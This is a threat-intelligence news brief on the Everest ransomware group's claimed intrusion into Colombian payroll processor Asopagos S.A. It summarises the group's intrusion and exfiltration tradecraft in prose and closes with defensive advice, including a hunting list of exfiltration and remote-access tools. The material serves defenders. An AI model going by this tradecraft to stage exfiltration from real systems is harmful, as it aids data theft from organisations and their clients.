On May 29, 2026, the Everest ransomware group added Colombian organization Asopagos S.A. to its dark web leak site, claiming responsibility for a successful intrusion and threatening to publish exfiltrated data unless ransom demands are met. The disclosure, surfaced by threat intelligence firm DeXpose, marks another escalation in Everest's sustained targeting of Latin American institutions throughout 2026.
What Happened
Everest operators posted Asopagos S.A. to their Tor-based leak portal on May 29, 2026, signaling the conclusion of the initial intrusion-and-exfiltration phase of a double-extortion campaign. The group has not yet published full sample files, indicating the victim is currently within the negotiation window before staged leaks typically begin. No public statement has been released by Asopagos S.A. confirming or denying the breach, and the group's posted note contained no excerpted ransom demand. Colombian sectoral regulators have not yet acknowledged a coordinated response.
What Was Taken
Everest has not disclosed specific volumes or document categories in its initial listing, though the group's standard tradecraft involves bulk exfiltration of file shares, financial records, HR data, and customer databases prior to any encryption event. Given Asopagos S.A.'s role in Colombia's pension and payroll services ecosystem, exposed data likely includes personally identifiable information of contributors, banking instructions, social security identifiers, and internal financial records. Historical Everest leaks have ranged from tens of gigabytes to several terabytes per victim.
Why It Matters
Asopagos S.A. operates within Colombia's social security contribution processing space, meaning a confirmed breach could cascade into exposure of citizen data tied to pension, health, and labor risk affiliations. Everest's targeting pattern through 2025 and 2026 has consistently favored financial intermediaries and government-adjacent service providers across Latin America, signaling a deliberate regional focus. For defenders across LATAM finance and fintech, this incident reinforces that mid-tier processors and aggregators remain priority targets because of their data concentration and comparatively softer perimeters versus tier-one banks.
The Attack Technique
Everest has historically gained initial access through purchased credentials from initial access brokers, exploitation of internet-facing remote access services (RDP, VPN appliances), and credentials harvested from infostealer malware logs sold on Russian-language forums. Post-compromise, the group typically deploys legitimate remote management tools alongside Cobalt Strike for lateral movement, uses rclone or MEGA for data staging and exfiltration, and in some cases deploys encryption payloads while in other engagements shifts to extortion-only operations. The specific intrusion vector at Asopagos S.A. has not been publicly disclosed.
What Organizations Should Do
- Audit exposure to infostealer-sourced credentials by reviewing dark web monitoring feeds for employee and partner email addresses, then force-reset any matched accounts and revoke session tokens.
- Enforce phishing-resistant MFA on all external-facing services, prioritizing VPN, RDP, email, and privileged identity systems.
- Validate offline, immutable backup integrity through quarterly restore drills, ensuring recovery point objectives align with regulatory continuity expectations.
- Hunt for Everest-associated tradecraft: anomalous rclone or MEGAcmd execution, unauthorized AnyDesk or ScreenConnect installs, and Cobalt Strike beacon traffic patterns.
- Segment critical financial processing environments from general corporate IT, limiting blast radius from a single compromised endpoint.
- Pre-engage legal counsel and incident response retainers so negotiation, regulatory notification, and forensic timelines can begin within hours rather than days of detection.
Sources: Everest Ransomware Group Strikes Asopagos S.A. in Colombia - DeXpose